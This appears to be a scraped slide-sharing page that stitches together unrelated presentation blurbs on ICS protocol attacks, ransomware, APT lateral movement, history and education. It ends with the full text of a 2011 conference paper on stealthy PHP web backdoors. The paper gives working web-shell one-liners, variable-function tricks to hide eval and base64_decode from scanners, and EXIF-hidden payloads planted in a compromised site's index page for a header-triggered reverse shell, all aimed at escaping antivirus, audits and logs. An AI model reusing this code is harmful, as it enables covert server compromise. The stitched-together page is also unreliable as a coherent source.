This document discusses techniques for creating stealthy web application backdoors. It begins by explaining how simple modifications can help evade signature-based antivirus detection. Next, it analyzes some tools that can detect backdoors by searching for suspicious functions. The main part proposes three evasion techniques: 1) Using variable functions instead of direct calls 2) Embedding backdoor code directly in webpage 3) Hiding code in JPEG EXIF headers to avoid input-based detection. The goal is to design backdoors that are small, avoid common triggers and stay undetectable to automated scans and manual code reviews.
A Presentation On Basic Network Security And Viruses For College Level. Basics on Networking, Network Security, Virus, Spyware, Vulnerability, Hacking And Indian Laws To Prevent Hacking
This white paper includes all the basic things about Rootkit, how they work, their types, detection methods, their uses, the concept of payload, and rootkit removal.
Keylogger can either be software or hardware device, which is designed to surveillance on user’s activity by tracing keystrokes.
https://how-to-remove.org/malware/keylogger/
https://www.facebook.com/Hilary-Park-1636750126622779/
https://twitter.com/hilarypark97
https://plus.google.com/u/0/102986887893246664116
https://www.pinterest.com/hilarypark97/
This excellent session by Alexander Bolshev (@dark_k3y) was a very pleasant surprise, and it's a bit frustrating that it is one of the three lost S4x14 videos.
We were concerned that it would be a bit S4x13 / insecure by design / low hanging fruit, but HART has received so little attention that we thought it was worth including in S4x14. HART is widely used in DCS to connect controllers and instruments. The HART Foundation says over 30 million HART devices are deployed.
Alexander covers the protocol in the early slides, but make sure you look at slides 16-21 where he shows how he can change the RTU's Polling Unit ID (who the RTU expects to poll it) to create a man-in-the-middle attack.
There are a number of other HART protocol attacks described, but I was most interested in his HRT Shield board - a high-power low-noise HART modem Arduino shield for sniffing, injecHng, and jamming current loop. He brought over some boards that we are building up to have in our Rack when we go out on an assessment.
I should note, mainly to avoid an email from Jeff, that WirelessHART has integrated security such as source/data authentication and encryption. As we walk through plants and factories we are seeing a number of these WirelessHART devices. They are easy to spot because they can be deployed in the most physically convenient place without worrying about wiring.
A Presentation On Basic Network Security And Viruses For College Level. Basics on Networking, Network Security, Virus, Spyware, Vulnerability, Hacking And Indian Laws To Prevent Hacking
This white paper includes all the basic things about Rootkit, how they work, their types, detection methods, their uses, the concept of payload, and rootkit removal.
Keylogger can either be software or hardware device, which is designed to surveillance on user’s activity by tracing keystrokes.
https://how-to-remove.org/malware/keylogger/
https://www.facebook.com/Hilary-Park-1636750126622779/
https://twitter.com/hilarypark97
https://plus.google.com/u/0/102986887893246664116
https://www.pinterest.com/hilarypark97/
This excellent session by Alexander Bolshev (@dark_k3y) was a very pleasant surprise, and it's a bit frustrating that it is one of the three lost S4x14 videos.
We were concerned that it would be a bit S4x13 / insecure by design / low hanging fruit, but HART has received so little attention that we thought it was worth including in S4x14. HART is widely used in DCS to connect controllers and instruments. The HART Foundation says over 30 million HART devices are deployed.
Alexander covers the protocol in the early slides, but make sure you look at slides 16-21 where he shows how he can change the RTU's Polling Unit ID (who the RTU expects to poll it) to create a man-in-the-middle attack.
There are a number of other HART protocol attacks described, but I was most interested in his HRT Shield board - a high-power low-noise HART modem Arduino shield for sniffing, injecHng, and jamming current loop. He brought over some boards that we are building up to have in our Rack when we go out on an assessment.
I should note, mainly to avoid an email from Jeff, that WirelessHART has integrated security such as source/data authentication and encryption. As we walk through plants and factories we are seeing a number of these WirelessHART devices. They are easy to spot because they can be deployed in the most physically convenient place without worrying about wiring.
Malware's Most Wanted: CryptoLocker—The Ransomware TrojanCyphort
The CryptoLocker Malware encrypts certain files with a private key and demands payment to regain access to the files. Nick Bilogorskiy, Director of Security Research, presents this deep dive into CryptoLocker and looks at the latest information around what is called one of the two most sophisticated and destructive forms of malicious software in existence. (The other being Gameover Zeus.)
Malware’s Most Wanted is a monthly series to inform IT security professionals on the details of the most dangerous advanced persistent threats. Attendees receive a special edition t-shirt.
Over the last few months, there has been tremendous growth in the number of ransomware attacks in the wild. What was once an attack technique aimed at susceptible individual users can now infiltrate advanced enterprise networks as well. In this presentation, you will learn how ransomware attacks propagate and what steps your organization can take to prevent them.
Cyphort Labs presents "Malware's Most Wanted: Ransomware Resurgence: Locky and Other “New Cryptolockers”
Like many viruses, botnets and malware families that we’ve seen over the past decade, hackers continue to find new ways of reinventing old threats. And this is no different for Ransomware.
Ransomware has come a long way from non-encrypting lockscreen FBI scare warnings like Reveton. In 2016 alone, there have been new ransomware families popping up and we expect that to only pick up steam over the summer.
In this edition of MMW, Nick Bilogorskiy, Senior Director of Threat Operations at Cyphort, will discuss:
Locky, the new “it” ransomware and how it works
A deep dive into a new family of ransom locker discovered by Cyphort Labs in March, that uses TOR Hidden Service
Other new ransomware families and why it’s becoming the preferred monetization method for attackers
This gives insight on how people manipulate online servers to do harm, *without* exposing security risks.This simply explains whats going on during this activity and how to protect yourself.
Secure Kernel Machines against Evasion AttacksPluribus One
Authors: Paolo Russu, Ambra Demontis, Battista Biggio, Giorgio Fumera, and Fabio Roli (University of Cagliari, Italy).
Talk by Battista Biggio at AISec '16, co-located with CCS '16 in Vienna, Oct. 28 2016.
Ransomware has become one of the most widespread and damaging threats that internet users face. Since the infamous CryptoLocker first appeared in 2013, we’ve seen a new era of file-encrypting ransomware variants delivered through spam messages and Exploit Kits, extorting money from home users and businesses alike.
A combined approach to search for evasion techniques in network intrusion det...eSAT Journals
Abstract Network Intrusion Detection Systems (NIDS) whose base is signature, works on the signature of attacks. They must be updated quickly in order to prevent the system from new attacks. The attacker finds out new evasion techniques so that he should remain undetected. As the new evasion techniques are being developed it becomes difficult for NIDS to give accurate results and NIDS may fail. The key aspect of our paper is to develop a network intrusion detection system using C4.5 algorithm where Adaboost algorithm is used to classify the packet as normal packet or attack packet and also to further classify different types of attack. Apriori algorithm is used to find real time evasion and to generate rules to find intrusion These rules are further given as input to Snort intrusion detection system for detecting different attacks. Keywords: NIDS, Evasion, Apriori Algorithm, Adaboost Algorithm, Snort
You've seen the headlines. You're beginning to understand the importance of cybersecurity. Where do you begin? It's important to understand the common methods of attack and ways you can begin to protect your organization today. For more information on our cybersecurity education please visit FPOV.com/edu.
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...CODE BLUE
TeamT5 has helped many cyber-attack victims defending against APT actors for years. We see enormous cases showing that the actors still maintained their access to the victim network after some malware cleaning by unexperienced network managers or immature security teams. The main reason would be lacking knowledge regarding threat actors’ techniques in lateral movement operations. For example, Microsoft Windows Active Directory plays a key role and dominates most corporate network environments for centralized management and authentication. However, there are many scenarios of improper security settings would cause Active Directory attacks to become a convenient way for threat actors to move around.
In this talk, we are going to present lateral movement methods to penetrate corporate network environment and techniques to bypass security monitoring systems. All cases are based on our real experiences fighting with APT actors in recent years. We categorize them into 4 categories and list the items as below:
1.AD Farm's penetration technique: mimilib, MemSSP, skeleton key, ACL abuse
2.Web-shell technique: IIS module abuse, Web source code injection, Deserialization, Rootkit
3.Second Tier backdoor techniques: DLL-hijack, IAT insert, Port reuse
4.Miscellaneous technique: how actors moving laterally in your network without malware or hacking tools.
The target audiences of this talk include security researchers, antivirus vendors, SOC team analyst and incident response teams. The techniques disclosed in this talk would help and facilitate blue team members to detect and understand threat actors’ footprints inside a corporate network and effectively block their activities.
On August 2017 a well established Corporation was hit by an advanced attacker. The techniques adopted to overcome security platforms and infrastructures showed a very dangerous and innovative attacker. This is the tale of the IR team hired to fight this advanced attacker, a tale of a team pushing all his resources and technical skills to overcome the threat and finally chase the Adder...
Advanced Malware Analysis Training Session 2 - Botnet Analysis Part 1 securityxploded
This presentation is part of our Advanced Malware Analysis Training Series program.
For more details refer our Security Training page
http://securityxploded.com/security-training.php
Profiling PHP - AmsterdamPHP Meetup - 2014-11-20Dennis de Greef
Your application needs to be fast nowadays in order to stand out from the crowd. Study has shown that application performance has a psychological effect on customer satisfaction. Profiling can give you more insight in how your application really works internally. It gives you an overview of where the resource bottlenecks in your application reside. In this talk, I am going to give an overview of some profiling methods that exist today, and where I think we should be heading. After this talk, you will be able to use some basic profiling tricks to analyse the performance constraints in your application.
http://www.meetup.com/AmsterdamPHP/events/168161882/
The French Revolution, which began in 1789, was a period of radical social and political upheaval in France. It marked the decline of absolute monarchies, the rise of secular and democratic republics, and the eventual rise of Napoleon Bonaparte. This revolutionary period is crucial in understanding the transition from feudalism to modernity in Europe.
For more information, visit-www.vavaclasses.com
Ethnobotany and Ethnopharmacology:
Ethnobotany in herbal drug evaluation,
Impact of Ethnobotany in traditional medicine,
New development in herbals,
Bio-prospecting tools for drug discovery,
Role of Ethnopharmacology in drug evaluation,
Reverse Pharmacology.
How to Make a Field invisible in Odoo 17Celine George
It is possible to hide or invisible some fields in odoo. Commonly using “invisible” attribute in the field definition to invisible the fields. This slide will show how to make a field invisible in odoo 17.
Students, digital devices and success - Andreas Schleicher - 27 May 2024..pptxEduSkills OECD
Andreas Schleicher presents at the OECD webinar ‘Digital devices in schools: detrimental distraction or secret to success?’ on 27 May 2024. The presentation was based on findings from PISA 2022 results and the webinar helped launch the PISA in Focus ‘Managing screen time: How to protect and equip students against distraction’ https://www.oecd-ilibrary.org/education/managing-screen-time_7c225af4-en and the OECD Education Policy Perspective ‘Students, digital devices and success’ can be found here - https://oe.cd/il/5yV
Read| The latest issue of The Challenger is here! We are thrilled to announce that our school paper has qualified for the NATIONAL SCHOOLS PRESS CONFERENCE (NSPC) 2024. Thank you for your unwavering support and trust. Dive into the stories that made us stand out!
2024.06.01 Introducing a competency framework for languag learning materials ...Sandy Millin
http://sandymillin.wordpress.com/iateflwebinar2024
Published classroom materials form the basis of syllabuses, drive teacher professional development, and have a potentially huge influence on learners, teachers and education systems. All teachers also create their own materials, whether a few sentences on a blackboard, a highly-structured fully-realised online course, or anything in between. Despite this, the knowledge and skills needed to create effective language learning materials are rarely part of teacher training, and are mostly learnt by trial and error.
Knowledge and skills frameworks, generally called competency frameworks, for ELT teachers, trainers and managers have existed for a few years now. However, until I created one for my MA dissertation, there wasn’t one drawing together what we need to know and do to be able to effectively produce language learning materials.
This webinar will introduce you to my framework, highlighting the key competencies I identified from my research. It will also show how anybody involved in language teaching (any language, not just English!), teacher training, managing schools or developing language learning materials can benefit from using the framework.
1. Meet Us at http://www.Garage4Hackers.com FB1H2S
[http://www.Garage4Hackers.com]
[Web Backdoors]
[Attack, Evasion and Detection]
[fb1h2s aka Rahul Sasi]
[G4H 2011]
2. Meet Us at http://www.Garage4Hackers.com FB1H2S
Abstract: This paper provides insight on common web back doors and how simple manipulations could
make them undetectable by AV and other security suits. Paper explains few techniques that could be
used to render undetectable and unnoticed backdoors inside web applications.
This paper is mainly an update for an old paper of ours Effectiveness of Antivirus in Detecting Web
Application Backdoors, which mainly questioned the effectiveness of AV with respect to web shells and
analysis of a couple of web shells. Current paper takes this topic further and explains a couple of
methodologies that could be used to make stealth application layer backdoors using web scripting
languages .This paper explains various Web Backdoor attacks and evasion techniques that could be used
to stay undetected .
Web Application Backdoors:
They are simple scripts built using web applications programs that would serve an attacker as a
backdoor to the application hosting environment.
Detection Methods [Signature Based Detection]
In this technique the Antivirus software’s need to have the signature of the Backdoor, and for that the
companies should already have had a copy of the backdoor for analyzing.
Evading Signature Based Detection:
We have previously documented how easy it was to bypass signature based detection. Based on further
analysis we were able to conclude that, all most all AV use simple md5 check sum as signature for
detecting common Web backdoors or simple text based signatures, though AV using MD5 or other
check sum for detection is not any new news. This could be a night mare for many sys admin.
A very common backdoor named cybershell.php was scanned with Total Av scanner and following were
the results.
#Analysis 1.1
Sample md5: ef8828e0bc0641a655de3932199c0527
File Name: cybershell.php
Submission date: 2011-08-29 12:00:02 (UTC)
Result: 20 /44 (45.5%)
3. Meet Us at http://www.Garage4Hackers.com FB1H2S
So for bypassing this it is pretty easy, just add an extra comment line inside the code or strip out few
strings from the code and that would be it.
#Analysis 1.2
Sample md5: 251e62025daf17be22a028baa8d2b506
File Name: cybershell.php
Submission date: 2011-08-29 12:20:42 (UTC)
Result: 0 /44 (00.00%)
We have already documented on how easy it is to bypass AV detection of web backdoors and its pretty
simple and making a document for that it is pointless. May be better ways of detecting them would be a
good scope of research.
Moving on to the main paper, since that we know by now that AV are of no use detecting Web
backdoors, there is no point in finding evasion techniques for them. But there are a handful of good
tools and scripts that could scan and detect such backdoors. And also a server admin who is browsing
though the source of his web server could easily figure out these ugly backdoors. So this paper would be
mainly on how to evade these situations (examples would be in php).
Web Backdoor Shell Detection on Servers (Specialized Tools)
As documented here , the following are few specialized tools that are effective and
1. Web Shell Detection Using NeoPI - A python Script
(https://github.com/Neohapsis/NeoPI)
2. PHP Shell Scanner - A perl Script
(http://ketan.lithiumfox.com/doku.php?id=phpshell_scanner)
3. PHP script to find malicious code on a hacked server - A PHP Script
(http://25yearsofprogramming.com/blog/2010/20100315.htm)
So the logic used by most of these scanners is simply to find all reference to the following
function calls, these functions are mainly used for file management and OS command execution
and are unavoidable parts in web shells.
grep -RPn
"(system|phpinfo|pcntl_exec|python_eval|base64_decode|gzip|mkdir|fopen|fclose|read
file|passthru)" /pathto/webdir/
4. Meet Us at http://www.Garage4Hackers.com FB1H2S
NeoPI
NeoPI is a Python script that uses a variety of statistical methods to detect obfuscated and
encrypted content within text and script files. The intended purpose of NeoPI is to aid in the
identification of hidden web shell code. The development focus of NeoPI was creating a tool
that could be used in conjunction with other established detection methods such as Linux
Malware Detect or traditional signature/keyword based searches.
[Source]
In the above list NeoPI provides better result than the rest and we will concentrate dealing with this
particular tool. One issues with these tools are, manual assessment is very much required since there
are a lot of false positives.
Few Backdoor codes these scanners will detect.
Php Back tick Method
<?=@`$_`?> //Php Back tick Method
Any code containing any of the above mentioned black listed functions would be caught.
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v =
@ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents();
@ob_clean(); echo $v;}
The following would be detected as NEOIP has got a mechanism to scan check for natural language, and
the series of encoded values would be flagged.
$code =
“aGVsbG8gYWxsIHRoaXMgaXMganVzdCBhIHRlc3QgZm9yIHRoZSBwYXBlciBub3RoaW5nIGJh
ZCBidWhhIGhhIGhhIGhlbGxvIGFsbCB0aGlzIGlzIGp1c3QgYSB0ZXN0IGZvciB0aGUgcGFwZXIgb
m90aGluZyBiYWQgYnVoYSBoYSBoYWhlbGxvIGFsbCB0aGlzIGlzIGp1c3QgYSB0ZXN0IGZvciB0a
GUgcGFwZXIgbm90aGluZyBiYWQgYnVoYSBoYSBoYWhlbGxvIGFsbCB0aGlzIGlzIGp1c3QgYSB0
ZXN0IGZvciB0aGUgcGFwZXIgbm90aGluZyBiYWQgYnVoYSBoYSBoYQ==”
Decodethis($code)
5. Meet Us at http://www.Garage4Hackers.com FB1H2S
Evasion Techniques
Evasion #1:
Situation: Admin Might Scan his server with one of the above tools.
Evasion:
Php supports Variable Function :
// following code is detected as base64_decode is detected as malicious
content by one of the above tools
<?php
$badcode =”am_encoded_bad_code_buhaha”;
Eval(base64_decoded($badcode);
?>
An alternate way to bypass the scan would be done the following way.
<?php
$badcode =”am_encoded_bad_code_buhaha” ;
$b = “base”;
$c = “64_”;
$d =”decode”;
alternate = $b.$c.$d;
eval(alternate($badcode);
We will be explaining an alternate for EVAL soon.
6. Meet Us at http://www.Garage4Hackers.com FB1H2S
Evasion #2:
Situation: Admin manually searches through source code, he could possibly get suspicious the
string like base64 etc, he might spot large encoded strings in his web application files.
Evasion: A simple evasion for making this work would be to make the backdoor code as small
as possible; so that it could be included with other code and remain undetected.
<?
$_ = $_GET[2];
$__= $_GET[1] ;
echo '<pre>'.$_($__).'</pre>';
?>
It could be further shortened to the following format
<?=($_=@$_GET[c]).@$_($_GET[f])?>
These small few lines of code would be able to give command execution. It would be
completely undetectable by any of the above tools and not easily by manual code audits.
Changing the above code from using GET request to POST request would prevent it from
showing up in logs files too.
7. Meet Us at http://www.Garage4Hackers.com FB1H2S
Evasion #3:
Situation: The applications are audited using some source code audit scanners that detect all
possible user inputs fields and traces possible code injection attacks. Thus taking the input via
_GET and _POST method might get detected.
Evasion:
It’s possible to place data inside JPEG EXIF headers, so we will put all function calls and data
inside an image and assemble them at runtime, that way the inputs would be coming not form
user but form a local source .
<?php
$_ = exif_read_data ('image.jpg');
$d=$_['Make']; //base64_decode
$str = $_['Code']; // Evil Base64_encoded code
eval($d($str)); // eval(base64_decode(code))
?>
Here image.jpeg, could contain all our php code and shell codes, and the exif_read_data tag
could be used to call individual meta tags and function calls could be constructed at runtime.
Similarly we could hide a reverse shell inside an image and place it inside the index page, so
whenever a request to the main page is made with a particular HTTP Header our backdoor
would be triggered, this way it would be less noisy and undetectable by AV, code audits, and any
backdoor hunting script.
Note: An alternate for eval would be using the preg_replace() function with /e switch :
<?php
$code_fb = 'print( 'Hello, fb1h2s !'.PHP_EOL)';
preg_replace('/(.*)/e', $code_fb, '' );
?>
8. Meet Us at http://www.Garage4Hackers.com FB1H2S
Demo:
The above small piece of code is injected into index page of a compromised site.
The image with the actual malicious code is added to sites /images directory.
Code is triggered on a particular HTTP header may be user_agent == w1d0ws.
On accessing the index page we will get a reverse shell.
Benefits:
Backdoor remains undetected from shell scanners and AV
Remains undetected form code auditing software’s.
No traces in log files
Here is how it looks:
Am an innocent page
Request:
9. Meet Us at http://www.Garage4Hackers.com FB1H2S
Shell Obtained:
Improvements:
The POC code/demo would have a PHP code that would be able to load shell codes and provide connect
back shell.
Thanks for Reading,
Fb1h2s @ gmail.com
http://www.Garage4Hackers.com
[This paper was presented and demos were given at C0C0N Sec Conference 2011 Oct -9 ]